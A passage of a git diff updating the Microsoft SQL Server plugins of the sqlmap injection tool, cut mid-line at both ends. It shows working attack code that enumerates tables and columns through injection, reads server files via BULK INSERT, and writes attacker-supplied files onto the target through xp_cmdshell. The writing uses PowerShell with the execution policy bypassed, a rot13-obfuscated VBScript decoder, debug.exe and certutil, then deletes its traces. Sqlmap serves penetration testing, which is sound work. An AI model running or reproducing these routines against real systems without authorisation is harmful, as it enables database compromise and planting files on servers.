arrayizeValue(value) if _] + value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] kb.data.cachedTables[db] = value if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue infoMsg = "fetching number of tables for " @@ -127,13 +140,13 @@ def getTables(self): if count != 0: warnMsg = "unable to retrieve the number of " warnMsg += "tables for database '%s'" % db - logger.warn(warnMsg) + logger.warning(warnMsg) continue tables = [] for index in xrange(int(count)): - _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index + _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index) table = inject.getValue(_, union=False, error=False) if not isNoneValue(table): @@ -146,9 +159,9 @@ def getTables(self): else: warnMsg = "unable to retrieve the tables " warnMsg += "for database '%s'" % db - logger.warn(warnMsg) + logger.warning(warnMsg) - if not kb.data.cachedTables: + if not kb.data.cachedTables and not conf.search: errMsg = "unable to retrieve the tables for any database" raise SqlmapNoneDataException(errMsg) else: @@ -159,13 +172,16 @@ def getTables(self): def searchTable(self): foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table + tblList = conf.tbl.split(',') + rootQuery = queries[DBMS.MSSQL].search_table tblCond = rootQuery.inband.condition tblConsider, tblCondParam = self.likeOrExact("table") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -180,7 +196,7 @@ def searchTable(self): infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -192,8 +208,12 @@ def searchTable(self): if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -202,7 +222,7 @@ def searchTable(self): values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - if isinstance(values, basestring): + if isinstance(values, six.string_types): values = [values] for foundTbl in values: @@ -213,7 +233,7 @@ def searchTable(self): else: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -225,10 +245,10 @@ def searchTable(self): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -243,34 +263,41 @@ def searchTable(self): kb.hintValue = tbl foundTbls[db].append(tbl) - for db, tbls in foundTbls.items(): + for db, tbls in list(foundTbls.items()): if len(tbls) == 0: foundTbls.pop(db) if not foundTbls: warnMsg = "no databases contain any of the provided tables" - logger.warn(warnMsg) + logger.warning(warnMsg) return conf.dumper.dbTables(foundTbls) self.dumpFoundTables(foundTbls) def searchColumn(self): - rootQuery = queries[Backend.getIdentifiedDbms()].search_column + rootQuery = queries[DBMS.MSSQL].search_column foundCols = {} dbs = {} whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + origTbl = conf.tbl origDb = conf.db colCond = rootQuery.inband.condition tblCond = rootQuery.inband.condition2 colConsider, colCondParam = self.likeOrExact("column") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -287,22 +314,24 @@ def searchColumn(self): infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} if conf.tbl: - _ = conf.tbl.split(",") + _ = conf.tbl.split(',') whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + _ = conf.db.split(',') infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + infoMsgDb = " not in system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) else: infoMsgDb = " across all databases" @@ -311,12 +340,15 @@ def searchColumn(self): colQuery = "%s%s" % (colCond, colCondParam) colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - for db in dbs.keys(): + for db in (_ for _ in dbs if _): db = safeSQLIdentificatorNaming(db) if conf.excludeSysDbs and db in self.excludeDbsList: continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + continue + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query % (db, db, db, db, db, db) query += " AND %s" % colQuery.replace("[DB]", db) @@ -324,11 +356,11 @@ def searchColumn(self): values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - if isinstance(values, basestring): + if isinstance(values, six.string_types): values = [values] for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) if foundTbl is None: continue @@ -336,16 +368,16 @@ def searchColumn(self): if foundTbl not in dbs[db]: dbs[db][foundTbl] = {} - if colConsider == "1": + if colConsider == '1': conf.db = db conf.tbl = foundTbl conf.col = column - self.getColumns(onlyColNames=True, bruteForce=False) + self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\ - and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): + if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) + kb.data.cachedColumns = {} else: dbs[db][foundTbl][column] = None @@ -359,7 +391,7 @@ def searchColumn(self): infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (column, db) logger.info("%s%s" % (infoMsg, infoMsgTbl)) @@ -372,10 +404,10 @@ def searchColumn(self): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % column warnMsg += "in database '%s'" % db - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -400,7 +432,7 @@ def searchColumn(self): conf.tbl = tbl conf.col = column - self.getColumns(onlyColNames=True, bruteForce=False) + self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 076874ac7a1..416cf2d28f5 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -1,21 +1,26 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import codecs import ntpath import os +from lib.core.common import checkFile from lib.core.common import getLimitRange from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import posixToNtSlashes from lib.core.common import randomStr from lib.core.common import readInput -from lib.core.convert import hexencode +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED @@ -27,9 +32,6 @@ from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - def _dataToScr(self, fileContent, chunkName): fileLines = [] fileSize = len(fileContent) @@ -45,14 +47,14 @@ def _dataToScr(self, fileContent, chunkName): scrString = "" for lineChar in fileContent[fileLine:fileLine + lineLen]: - strLineChar = hexencode(lineChar) + strLineChar = encodeHex(lineChar, binary=False) if not scrString: scrString = "e %x %s" % (lineAddr, strLineChar) else: scrString += " %s" % strLineChar - lineAddr += len(lineChar) + lineAddr += len(strLineChar) // 2 fileLines.append(scrString) @@ -66,35 +68,39 @@ def _updateDestChunk(self, fileContent, tmpPath): chunkName = randomStr(lowercase=True) fileScrLines = self._dataToScr(fileContent, chunkName) - logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) + logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) - logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) + logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) - commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "debug < %s" % randScr, + "del /F /Q %s" % randScr + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) return chunkName - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + def stackedReadFile(self, remoteFile): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) result = [] txtTbl = self.fileTblName - hexTbl = "%shex" % self.fileTblName + hexTbl = "%s%shex" % (self.fileTblName, randomStr()) self.createSupportTbl(txtTbl, self.tblField, "text") inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) - logger.debug("loading the content of file '%s' into support table" % rFile) - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True) + logger.debug("loading the content of file '%s' into support table" % remoteFile) + inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) - # Reference: http://support.microsoft.com/kb/104829 + # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829 binToHexQuery = """DECLARE @charset VARCHAR(16) DECLARE @counter INT DECLARE @hexstr VARCHAR(4096) @@ -145,7 +151,7 @@ def stackedReadFile(self, rFile): if not isNumPosStrValue(count): errMsg = "unable to retrieve the content of the " - errMsg += "file '%s'" % rFile + errMsg += "file '%s'" % remoteFile raise SqlmapNoneDataException(errMsg) indexRange = getLimitRange(count) @@ -158,60 +164,74 @@ def stackedReadFile(self, rFile): return result - def unionWriteFile(self, wFile, dFile, fileType): + def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "Microsoft SQL Server does not support file upload with " errMsg += "UNION query SQL injection technique" raise SqlmapUnsupportedFeatureException(errMsg) - def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): + def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType - infoMsg += "to file '%s', please wait.." % dFile + infoMsg += "to file '%s'" % remoteFile logger.info(infoMsg) - randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - encodedFileContent = hexencode(wFileContent) + encodedFileContent = encodeBase64(localFileContent, binary=False) + encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) + encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) - # TODO: need to be fixed - psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile) - psString = psString.encode('utf-16le') - psString = psString.encode("base64")[:-1].replace("\n", "") + randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) + randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) - logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath) + localFileSize = len(encodedFileContent) + chunkMaxSize = 1024 - self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) + logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) - logger.debug("converting the file utilizing PowerShell EncodedCommand") + for i in xrange(0, localFileSize, chunkMaxSize): + wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] + self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) - commands = ("cd %s" % tmpPath, - "powershell -EncodedCommand %s" % psString, - "del /F /Q %s" % randFilePath) - complComm = " & ".join(command for command in commands) + psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath + psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " + psString += "[System.Convert]::FromBase64String($Base64); Set-Content " + psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile - self.execCmd(complComm) + logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) + self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) - def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): + logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile) + + commands = ( + "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, + "del /F /Q \"%s\"" % encodedBase64FilePath, + "del /F /Q \"%s\"" % randPSScriptPath + ) + + self.execCmd(" & ".join(command for command in commands)) + + def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): infoMsg = "using debug.exe to write the %s " % fileType - infoMsg += "file content to file '%s', please wait.." % dFile + infoMsg += "file content to file '%s', please wait.." % remoteFile logger.info(infoMsg) - dFileName = ntpath.basename(dFile) - sFile = "%s\%s" % (tmpPath, dFileName) - wFileSize = os.path.getsize(wFile) + remoteFileName = ntpath.basename(remoteFile) + sFile = "%s\\%s" % (tmpPath, remoteFileName) + localFileSize = os.path.getsize(localFile) debugSize = 0xFF00 - if wFileSize < debugSize: - chunkName = self._updateDestChunk(wFileContent, tmpPath) + if localFileSize < debugSize: + chunkName = self._updateDestChunk(localFileContent, tmpPath) - debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) - debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) + debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) + debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile) logger.debug(debugMsg) - commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) + commands = ( + "cd \"%s\"" % tmpPath, + "ren %s %s" % (chunkName, remoteFileName), + "move /Y %s %s" % (remoteFileName, remoteFile) + ) + self.execCmd(" & ".join(command for command in commands)) else: debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg += "sqlmap will split it into chunks locally, upload " @@ -219,138 +239,188 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp debugMsg += "on the server, please wait.." logger.debug(debugMsg) - for i in xrange(0, wFileSize, debugSize): - wFileChunk = wFileContent[i:i + debugSize] - chunkName = self._updateDestChunk(wFileChunk, tmpPath) + for i in xrange(0, localFileSize, debugSize): + localFileChunk = localFileContent[i:i + debugSize] + chunkName = self._updateDestChunk(localFileChunk, tmpPath) if i == 0: debugMsg = "renaming chunk " - copyCmd = "ren %s %s" % (chunkName, dFileName) + copyCmd = "ren %s %s" % (chunkName, remoteFileName) else: debugMsg = "appending chunk " - copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) + copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName) - debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) + debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName) logger.debug(debugMsg) - commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + copyCmd, + "del /F /Q %s" % chunkName + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) - logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) + logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile)) - commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "move /Y %s %s" % (remoteFileName, remoteFile) + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) - def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): + def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using a custom visual basic script to write the " - infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) + infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - - vbs = """Dim inputFilePath, outputFilePath - inputFilePath = "%s" - outputFilePath = "%s" - Set fs = CreateObject("Scripting.FileSystemObject") - Set file = fs.GetFile(inputFilePath) - If file.Size Then - Wscript.Echo "Loading from: " & inputFilePath - Wscript.Echo - Set fd = fs.OpenTextFile(inputFilePath, 1) - data = fd.ReadAll - fd.Close - data = Replace(data, " ", "") - data = Replace(data, vbCr, "") - data = Replace(data, vbLf, "") - Wscript.Echo "Fixed Input: " - Wscript.Echo data - Wscript.Echo - decodedData = base64_decode(data) - Wscript.Echo "Output: " - Wscript.Echo decodedData - Wscript.Echo - Wscript.Echo "Writing output in: " & outputFilePath - Wscript.Echo - Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) - ofs.Write decodedData - ofs.close - Else - Wscript.Echo "The file is empty." - End If - Function base64_decode(byVal strIn) - Dim w1, w2, w3, w4, n, strOut - For n = 1 To Len(strIn) Step 4 - w1 = mimedecode(Mid(strIn, n, 1)) - w2 = mimedecode(Mid(strIn, n + 1, 1)) - w3 = mimedecode(Mid(strIn, n + 2, 1)) - w4 = mimedecode(Mid(strIn, n + 3, 1)) - If Not w2 Then _ - strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) - If Not w3 Then _ - strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) - If Not w4 Then _ - strOut = strOut + Chr(((w3 * 64 + w4) And 255)) - Next - base64_decode = strOut - End Function - Function mimedecode(byVal strIn) - Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" - If Len(strIn) = 0 Then - mimedecode = -1 : Exit Function - Else - mimedecode = InStr(Base64Chars, strIn) - 1 - End If - End Function""" % (randFilePath, dFile) - + randFilePath = "%s\\%s" % (tmpPath, randFile) + + vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu + vachgSvyrCngu = "%f" + bhgchgSvyrCngu = "%f" + Frg sf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg") + Frg svyr = sf.TrgSvyr(vachgSvyrCngu) + Vs svyr.Fvmr Gura + Jfpevcg.Rpub "Ybnqvat sebz: " & vachgSvyrCngu + Jfpevcg.Rpub + Frg sq = sf.BcraGrkgSvyr(vachgSvyrCngu, 1) + qngn = sq.ErnqNyy + sq.Pybfr + qngn = Ercynpr(qngn, " ", "") + qngn = Ercynpr(qngn, ioPe, "") + qngn = Ercynpr(qngn, ioYs, "") + Jfpevcg.Rpub "Svkrq Vachg: " + Jfpevcg.Rpub qngn + Jfpevcg.Rpub + qrpbqrqQngn = onfr64_qrpbqr(qngn) + Jfpevcg.Rpub "Bhgchg: " + Jfpevcg.Rpub qrpbqrqQngn + Jfpevcg.Rpub + Jfpevcg.Rpub "Jevgvat bhgchg va: " & bhgchgSvyrCngu + Jfpevcg.Rpub + Frg bsf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg").BcraGrkgSvyr(bhgchgSvyrCngu, 2, Gehr) + bsf.Jevgr qrpbqrqQngn + bsf.pybfr + Ryfr + Jfpevcg.Rpub "Gur svyr vf rzcgl." + Raq Vs + Shapgvba onfr64_qrpbqr(olIny fgeVa) + Qvz j1, j2, j3, j4, a, fgeBhg + Sbe a = 1 Gb Yra(fgeVa) Fgrc 4 + j1 = zvzrqrpbqr(Zvq(fgeVa, a, 1)) + j2 = zvzrqrpbqr(Zvq(fgeVa, a + 1, 1)) + j3 = zvzrqrpbqr(Zvq(fgeVa, a + 2, 1)) + j4 = zvzrqrpbqr(Zvq(fgeVa, a + 3, 1)) + Vs Abg j2 Gura _ + fgeBhg = fgeBhg + Pue(((j1 * 4 + Vag(j2 / 16)) Naq 255)) + Vs Abg j3 Gura _ + fgeBhg = fgeBhg + Pue(((j2 * 16 + Vag(j3 / 4)) Naq 255)) + Vs Abg j4 Gura _ + fgeBhg = fgeBhg + Pue(((j3 * 64 + j4) Naq 255)) + Arkg + onfr64_qrpbqr = fgeBhg + Raq Shapgvba + Shapgvba zvzrqrpbqr(olIny fgeVa) + Onfr64Punef = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/" + Vs Yra(fgeVa) = 0 Gura + zvzrqrpbqr = -1 : Rkvg Shapgvba + Ryfr + zvzrqrpbqr = VaFge(Onfr64Punef, fgeVa) - 1 + Raq Vs + Raq Shapgvba""" + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581 + vbs = codecs.decode(vbs, "rot13") vbs = vbs.replace(" ", "") - encodedFileContent = wFileContent.encode("base64")[:-1] + encodedFileContent = encodeBase64(localFileContent, binary=False) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) - logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) + logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) - commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs, - "del /F /Q %s" % randVbs, - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "cscript //nologo %s" % randVbs, + "del /F /Q %s" % randVbs, + "del /F /Q %s" % randFile + ) + + self.execCmd(" & ".join(command for command in commands)) + + def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): + infoMsg = "using certutil.exe to write the %s " % fileType + infoMsg += "file content to file '%s', please wait.." % remoteFile + logger.info(infoMsg) + + chunkMaxSize = 500 + + randFile = "tmpf%s.txt" % randomStr(lowercase=True) + randFilePath = "%s\\%s" % (tmpPath, randFile) + + encodedFileContent = encodeBase64(localFileContent, binary=False) - self.execCmd(complComm) + splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): + logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) + + self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) + + logger.debug("decoding the file to %s.." % remoteFile) + + commands = ( + "cd \"%s\"" % tmpPath, + "certutil -f -decode %s %s" % (randFile, remoteFile), + "del /F /Q %s" % randFile + ) + + self.execCmd(" & ".join(command for command in commands)) + + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): # NOTE: this is needed here because we use xp_cmdshell extended # procedure to write a file on the back-end Microsoft SQL Server # file system self.initEnv() - self.getRemoteTempPath() tmpPath = posixToNtSlashes(conf.tmpPath) - dFile = posixToNtSlashes(dFile) - with open(wFile, "rb") as f: - wFileContent = f.read() + remoteFile = posixToNtSlashes(remoteFile) + + checkFile(localFile) + localFileContent = open(localFile, "rb").read() - self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) + self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) + + if written is False: + message = "do you want to try to upload the file with " + message += "the custom Visual Basic script technique? [Y/n] " + + if readInput(message, default='Y', boolean=True): + self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) + + if written is False: + message = "do you want to try to upload the file with " + message += "the built-in debug.exe technique? [Y/n] " - written = self.askCheckWrittenFile(wFile, dFile) + if readInput(message, default='Y', boolean=True): + self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) if written is False: message = "do you want to try to upload the file with " - message += "another technique? [Y/n] " - choice = readInput(message, default="Y") + message += "the built-in certutil.exe technique? [Y/n] " - if not choice or choice.lower() == "y": - self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) - #self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) + if readInput(message, default='Y', boolean=True): + self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return written diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 1e3ba250acb..18b4b0beb64 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -1,14 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -47,9 +46,9 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None - version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None + release = kb.bannerFp.get("dbmsRelease") + version = kb.bannerFp.get("dbmsVersion") + servicepack = kb.bannerFp.get("dbmsServicePack") if release and version and servicepack: banVer = "%s %s " % (DBMS.MSSQL, release) @@ -66,9 +65,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \ - or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) self.getBanner() @@ -85,20 +82,30 @@ def checkDbms(self): if conf.direct: result = True else: - randInt = randomInt() - result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt)) + result = 